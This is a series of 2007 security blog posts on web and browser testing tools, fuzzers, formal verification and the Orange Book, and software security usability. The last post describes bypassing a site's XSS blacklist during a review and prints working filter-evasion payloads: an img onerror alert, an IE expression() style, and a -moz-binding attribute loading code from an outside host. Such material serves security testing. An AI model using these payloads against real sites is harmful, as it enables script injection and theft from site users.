For the year 2008, I'd like to see replacement of standbys like RSnake's
XSS Cheat Sheet. While incredibly useful to me in 2006, it no longer
holds its weight compared to the WASC Script
Mapping project and
tools such as .mario's PHP Charset Encoder,
or Gareth Heyes'
Hackvertor.
One of the biggest lessons I learned about software weaknesses (SQLi and
XSS in particular) is that there is a concept of low-hanging fruit
(LHF), but at some point after the root-cause is found, more complex
attacks often work. However, this is largely true only when a security
tester has full source-code and framework knowledge. In this instance, a
spreadsheet such as the one found in the Microsoft Press' Hunting
Security Bugs companion
content,
"Reference -- ASP.NET Control Encoding", can be used to figure out which
classes encode on a per HTML, Script, or URI basis. What I've been
describing for awhile now is what will be known as hybrid analysis, with
hybrid (static + dynamic) tools becoming more rapidly available to
security testers.
For web applications, there are some great open-source static analysis
tools that can get a penetration-tester started in using a source-code
assisted black-box testing method. For PHP there is
Inspekt,
Pixy,
RATS,
SWAAT,
PHP-SAT,
PHPSecAudit,
PSA3, and
FIS
(File Inclusion Scanner, with the extended tool,
WebSpidah). For Java, there is
Milk (based on
Orizon),
LAPSE,
and SWAAT (only JSP). ASP classic and ASP.NET have ASP
Auditor, SWAAT, and
DN_BOFinder. Javascript
has JSLint. There are also static code
analysis tools specifically built for
browsers, such as
Oink and
DeHydra.
Speaking to browsers, I promised some information on fuzzing browsers
(to include ActiveX as well). First of all, we must mention Michal
Zalewski, who not only recently brought us Bunny The
Fuzzer, but also started
a modern version of the Crusades to create a battle between browsers and
web applications when he wrote
MangleMe. hdm
followed to create a bunch of
tools: Hamachi, CSSDIE,
DOM-Hanoi, and AxMan (for ActiveX similar to iDefense's
COMRaider). Before these guys, PROTOS had
c05-http-reply,
and eEye was still thinking about
TagBruteForcer.
Even the Mozilla team released a tool,
jsfuzzfun
this year, including
collaboratively
with
Opera.
The latest comes from GNUCITIZEN as WEB CLIENT
FUZZER.PY and
Ronald as BrowserFry.
Robert Hansen (RSnake) recently spoke at OWASP AppSec 2007 about Web
Browser (In)-Security (slides not available yet, so I don't know what he
covered). It's true that 89% of security vulnerabilities in browser
plug-ins from this year were in ActiveX applications. However, that
doesn't mean that you shouldn't keep your browser, Adobe Flash
Player, Java
installation, Adobe
Reader,
QuickTime, Windows Media
Player,
and Mozilla extensions
up-to-date at
all times. It also doesn't necessarily mean that
IE
is more insecure than Firefox, Opera, or Safari. They're all insecure
and it's your job to find out where and why. RSnake did release some
very cool code this year with the Master Recon
Tool (aka Mr.
T)` <http://browserfry.0x000000.com>`_. Expect to see more available
at Jay Beale's ClientVA website (and read
his presentation from Toorcon 9 on that same page).
Outside of regular security testing at home or in the lab, I'd like to
address the two commercial Software-as-a-Service (SaaS) solutions
available as outside security testing augmentation. WhiteHat
Security makes a product called Sentinel,
which embodies the WASC Threat
Classification (i.e. a way
of understanding attack-paths against web applications). WhiteHat has a
mature understanding of web application vulnerabilities from an attacker
perspective, which is ideal for people that are learning how to think
like an attacker. Veracode also provides a
service, SecurityReview, which also happens to be CWE-Compatible (and
the only commercial solution that has to-date formally passed the
criteria besides SofCheck, an Ada source code analyzer). CWE is
invaluable information that can be given back to developers in order to
fix security vulnerabilities and avoid software weaknesses in coding
efforts.
For embedded systems such as the iPhone, or routers such as those made
by Cisco Systems, there is plenty of research out there to get you
started. If the device has a web browser, try using JS
Commander to proxy a low-featured (but
working) Javascript debugger. FX has plenty of material in The
Shellcoder's Handbook (2nd Edition) to get someone started on writing
vulnerabilities or exploits for Cisco IOS. The BinNavi tool has support
for at least Cisco IOS and Juniper ScreenOS, as well as a few other key
architectures. If any area is in need of formal methods for security
testing - it's software that is burned into hardware - so consider
taking embedded hardware security to the next level by referencing my
previous blog entry on Formal Methods and Security.
Posted by Dre on Saturday, November 24, 2007 in
Hacking and
Security.
Most information security practices, whether system, network,
application, software, or data -- come from original sources such as the
Orange Book. Most people assume that the Orange Book is no longer valid
for use in security today. If we had built systems around the Orange
Book concepts -- then why are we so insecure today? It must be outdated,
right?!
The Orange Book was primarily about two things: functionality and
assurance. Sound
familiar?
There is an implication that functionality and assurance (or usability
and security) are at odds with each other. The Orange Book and I would
agree that this is not the case. There are obvious problems with
building systems that "share" everything and "allow access to
everything". Assuming perfect authentication and session management --
"trusted" users are given access to the resources they need to perform
actions that become functional to them. There are many ways to control
authorization to these resources ranging from programmatic,
discretionary (DAC), mandatory (MAC), role-based (RBAC), and declarative
controls. By adding controls on a per-user/session basis -- the
security
policy of the
system forms a "privilege matrix" of sorts. This privilege model becomes
the penultimate means of formally verifying a system. If only there
weren't two major problems with this way of thinking: object reuse
(shared disk or memory concepts such as the stack and heap) and covert
channels (not just IPC/sockets, but also storage and timing channels),
which both exist completely outside of the privilege matrix.
The Orange Book defines assurance in four divisions (D, C, B, and A), A1
being the highest level of security. The ideas behind A1 is that access
control matrices (secure kernel, trusted path, and authorized users of a
system accessing resources) are formulated into security policy models.
These models must be formally verified to be considered A1.
Interestingly enough, the source-code itself did not require to be
formally verified. Formal specification and verification of source-code
goes beyond A1. If I know most of our readers, point yourself towards
the TCSEC article on Wikipedia
now.
But what are formal specification and verification and how would you
apply these concepts to source-code? Formal specification is an example
of a formal method. In today's world of modern applications, especially
web applications -- many development shops already perform the basics of
formal specification. Developers usually do this when they perform
business modeling, write requirements right (not write the right
requirements), and perform design before the implementation phase (i.e.
coding). It is thought by many that this is the perfect time to start
thinking about security.
Foundstone
claims that 70% of issues found during security testing (in the years
2005-2006) were discovered during threat-modeling and code review vs.
the other 30% which comes from vulnerability assessments. However,
according to
Gartner
-- security testing is done at the programming phase by 5 to 10 percent
of enterprises, 20 percent in the pre-deployment phase, and at
operations/maintenance phases by the remaining 70%. According to these
statistics, enterprises are clearly not writing security policy model
documentation as formal specifications, nor do they even know how to
formally verify a project's documentation -- let alone its source-code.
Automated formal methods are rarely ever used for making sure that
software even "works" let alone whether software is "secure". The first
step is to formally describe your system in a language that an automated
formal verification tool can understand. Most software engineers feel
that their source code should speak for itself (but then again, most
developers can't even do a
walkthrough of
their code in front of an audience on the same day that they wrote it).
Yet, neither do they want to talk about security early in the process.
For these special moments, there are many ways of tackling the problem
of raising the bar of security assurance.
The largest problem will remain with how the access control works in the
application, often considered business logic or "flaw"-related security
issues. Access control issues are hard to find, usually done manually.
It's difficult to re-design or re-write access control into an existing
application. Often, the design of the access control system is
sufficient for the application use -- but instead the developers forgot
to take into account the other problems with security: object reuse and
covert channels. These sorts of issues are typically semantic in nature
or "bug"-related security problems in the application. In standalone,
thick-client applications -- "patches" are often used to fix security
"bugs". A full-upgrade is usually required to fix security "flaws". With
web applications, either bugs or flaws can be deployed in parallel --
thus making it easier to address all types of security issues. However,
web applications also require re-coding, as modern attacks utilize
software weaknesses that affect input/output (whose root-cause is
typically improper validation and/or encoding), while pre-2005
attacks
were often against standalone applications that affected a single data
reference error (i.e. parser). Parser bugs typically have a root-cause
related to a buffer overflow, integer, or format string vulnerability.
Using source-code is probably a good way to formally verify any of these
type of "bug" security issues, but most interesting is that it can also
be used to identify "flaws" in the application logic as well.
There are many reasons that formal methods are not popular for finding
security issues in source-code. Assume that a formal specification has
already been written that describes what a system is and does.
Additionally, assume that the security correctness properties of such a
system have also been formally specified. In order to check these
properties against a system, one more thing has to be determined before
automated formal methods can be used. The size of state space can be
either small/finite, or extremely large (and possibly infinite). If the
state space is small, then all reachable states can be checked for each
property against the system model and verify that each is true. This is
known as
model-checking. If the
state space is too large to check every state, logical expressions can
be used to determine properties are always true. Opposed to
model-checking, automated
theorem-proving
attempts to logically prove theorems about the model, instead of
checking every state space. This works by using propositional logic,
which starts with a set of axioms and applying rules to derive
additional true statements under the working rules.
When a model-checker is run, a positive result can be the typical
pen-tester worry of "if it didn't find any problems, then you're not
sure if there are any problems or not". A negative result from a
model-checker can be useful for debugging those specific problems (which
conditions cause which errors). Theorem-provers, which are more
interactive, can be hand-checked on a positive result. A negative result
from a theorem-prover is useless simply because it shows that the
properties couldn't be solved. The first time I had heard of an
automated model-checker used for security purposes was by NIST when they
used SPIN to check the IPSec protocols and
state spaces for correctness. Recently, I've also come across Java
PathFinder, which provides a
more modern solution for automated model-checking.
I've always been curious as to who uses these and for what reasons. It's
possible that these tools are coming into maturity and can be used to
provide higher levels of software security assurance that haven't been
typically reached easily through other types of effort. Any project with
a realistic development deadline is never going to use one of these
tools as they exist today, but what about open-source projects,
especially ones that remain rather static over time? It would be
interesting to use open-source to improve formal methods for security
testing, as well as to use formal methods to check security in
open-source projects. Coverity has its
Scan project, where they test open-source
C/C++ projects (and now
Java) using
their model-checker, Prevent
SQS.
Organizations outside of Coverity can use SPIN or Java PathFinder (JPF)
for model-checking. JPF, in particular, is interesting because it
re-implements a JVM, providing a second opinion on a class file's
validity. This also presents additional limitations, in that external
API's are not available for testing -- which eliminates JDBC and J2EE
from being included in testing since the full Sun JDK API
implementations aren't available in JPF. However, for self-contained
programs or components, JPF can be great for analyzing runtime behavior,
especially if extended to support a critical component in the security
trustchain of a modern application. For example, some work has been done
using JPF to diagnose errors in the
Log4J
logging package.
There are many building blocks for building secure Java applications
that could stand to benefit from formal method testing. Log4J is one
example, but there are plenty of other pre-built components that can be
tested -- such as Reform, ACEGI, Commons Validator, Jasypt, JCE, JAAS,
Cryptix, BouncyCastle, HDIV, and HttpClient. Components which use
cryptography stand to inherit the most value from this sort of testing,
as timing attacks and side-channel attacks can be verified using formal
method testing. There will continue to exist organizations who
"roll-their-own" encryption, but if we can improve the assurance levels
of existing components -- the organizations that use these components
stand to gain higher levels of assurance to their authentication,
session management, authorization, and other components of their web
applications that are formally verified.
Formal methods exist completely outside of other types of security
testing, and allow uncovering of subtleties such as property states and
timing. Just by increasing overall robustness and assistance in
debugging can alone be enough to consider formal methods in an advanced
security testing methodology. However, it may be extremely daunting to
start one of these projects, as the barrier to entry is very high.
For good places to start, consider any given codebase such as Log4J that
doesn't implement encryption or authorization, but also that never
terminates. Using temporal
logic [1], model the states
of the application and determine properties that are true along a
sequence of events. Temporal
logic [2]
is a type of formal logic, which provides a precise human/machine
language to talk about things that may have been skipped over. When
formally specifying authentication protocols, usually only the message
exchange is talked about in documentation -- while conclusions that each
party draws from a message exchange may be left completely out. BAN
logic can
formally specify what parties perceive and conclude during
authentication protocol and handshake use. Using BAN logic, model the
assertions based on multiple autonomous parties -- and test using ACEGI
or similar.
There are much easier ways to find security-related bugs and flaws using
both source-code and runtime checking than by using formal methods. For
example, static source analysis, static bytecode analysis, fuzzing, and
fault-injection testing can be combined at implementation or build time
using well-known tools such as Fortify SCA, FindBugs (or FxCop), CUTE
(or Compuware SecurityChecker), and AppScan DE (or DevInspect). Many
security testers have expressed concern over these types of tools that
look for security weaknesses -- especially since they usually only take
into account semantic bugs and not design issues or logical flaws. Many
logical flaws exist around access control, and often appear in web
applications -- this has more to do with authentication, session
management, and authorization than any other security weakness. Using
top-level formal specifications to denote access control can save design
inspectors a lot of time. This could be improved by both verifying the
formal specifications for access control as well as mapping the design
to the source-code when performing manual code review.
There are few automated penetration-testing tools which help in
multi-user scenarios for dealing with access control or logical flaw
problems in web application security testing. Cenzic Hailstorm can run
traversals with multiple credentials, and Burp Intruder can use the
extract grep
option, alone, or along with recursive
grep.
Outside of access control, most logical flaws will still require design
inspection along with manual code review combined with a bit of luck.
However, formal methods such as model-checkers and theorem-provers
provide an advanced way of dealing with these types of issues.
Microsoft research has produced
SLAM (isn't this now called the
Visual Studio Management Model Designer or VSMMD?),
Fugue, and
the source code annotation
language
(SAL, which appears similar to Java's
JSR-305, Annotations for
Software Defect Detection) for use with formal methods. There are also
semiformal methods such as
MDA and
MDE, which
also have automated tools. But using any of these tools (semiformal or
formal methods) typically requires a mathematical background enough to
write a formal specification, often done using the Z
notation. This use is
radically complex for the average development environment -- even if a
critical component requires a higher level of assurance. Instead we are
stuck with standard security testing -- so many classes of flaws are
never uncovered.
In the end, I think the Orange book went very far to describe what is
needed for an assured system. Today, there is little chance that we can
build common applications that have such a granular and pedantic
approach to safety or security as the TCSEC A1 division. However, the
largest take I get from this is that requirements and designs should be
precise as possible, as well as inspected during review. If a design
includes an access control privilege matrix, security testing can be
modified to verify this matrix. Ideally, there would be some sort of
automated language-to-test conversion that occurs such as Microsoft SAL
or JSR-305. This will allow even coverage of both semantic bugs and
logical flaw security issues in modern applications.
Posted by Dre on Friday, November 23, 2007 in
Defense and
Security.
Roger Halbheer, Chief Security Advisor for Microsoft Europe, Middle
East, and Africa posted a comment last week in response to my post on
"Operating Systems are only as secure as the idiot using
it."
Roger is looking for some open discussion on improving the security
usability problem, instead of sitting back and complaining about it.
I have posted a
response
to his comment and Dre has also put some thought into his reply as well.
Some highlights:
Security engineering is not easy, and history has proven time and
time again that humans are infallible. We need to design secure
systems from the ground up, taking account for every distant node of
every network, both logical and physical. Take a banking application
for example; not only does the site have to be secure and free of
flaws, but also out-of-band channels used for transport
communications, such as account creation, recovery, etc.
From Dre;
While reading, "Geekonomics: The Real Cost of Insecure Software"
and speaking with people at Fortify Software, Veracode, Cigital, and
MITRE... I'm sold on the concept of a five-star "software
security assurance" rating system for both commercial and
open-source software to solve the "stem" of this user+security
problem...
...get the five-star rating system published everywhere, on the
software boxes, in newspapers, magazines, and everywhere the product
name goes. Make it a part of consumer reports; make it the most
important part of consumer reports. Make sure that expiration dates
are also published with the ratings, and have a place online where
people can go to check all the latest information on their software
security assurance ratings for all the applications that they use.
This doesn't even begin to touch the surface in Dre's post. Definitely
check it out, it's a worthy read.
Posted by Marcin on Monday, November 19, 2007 in
Security.
So the other day I was doing a web site review and looking for XSS
issues. I came across one ASP form that used various URL parameters to
make up parts of the form. Well, I poked around and and tried injecting
the usual, <script>alert('xss')</script>. The page went straight to
a 404 Not Found, so it must have been doing some kind of filtering. I
tried using various cases of <script> and also UTF-8 encoding the
script.
Nothing was working here, so I put in <scrpt> and the page worked,
and I saw the tag was being inserted into the page. The page was doing
filtering on the word script, so I knew I had to work around it somehow.
What I ended up doing, was injecting an image tag that pointed to
nothing, and an onerror event. Like so:
<img src="" onerror=alert(/xss/)>
And viola! XSS within five minutes. This was a pretty simple case, and
the blacklist was not comprehensive at all, but it just goes to show
there will always be ways around a filter. Also, be sure to use more
than just a single browser when testing web applications for security
flaws. Not every attack will work on Firefox and IE. Take the following
that I used against a search page for IE only:
</XSS/*-*/STYLE=xss:e/**/xpression(alert(1337))>
On another page, "onerror" was being filtered, so I had to work around
that. I needed something a little better, so I skipped the image and
script tags, and went straight to the input tags. I ended up using:
" style="-moz-binding:url('http://h4k.in/')>
This brings me to a couple new resources I came across, thanks to .mario
in #slackers IRC channel. During the
development and ongoing testing of the PHP-IDS
project, mario wrote this awesome PHP Charset
Encoder. This interesting
thread
came up in our discussion as well, which is pretty cool and could be
used in evading filters. If
RTL looks familiar
to you, like it did to me... Perhaps you've seen RSnake's weird "Dolce
& Gabanna" page? Right click
> View source and take a look at some of the tags, one of them is RTL.
Now to decipher the rest of that HTML code. hahaha. Oh, one last thing
to wrap this post up... Don't forget the XSS Cheat
Sheet, also available in
XML for use in your own scripts.
It's been really useful these past couple days.
Posted by Marcin on Thursday, November 15, 2007 in
Security.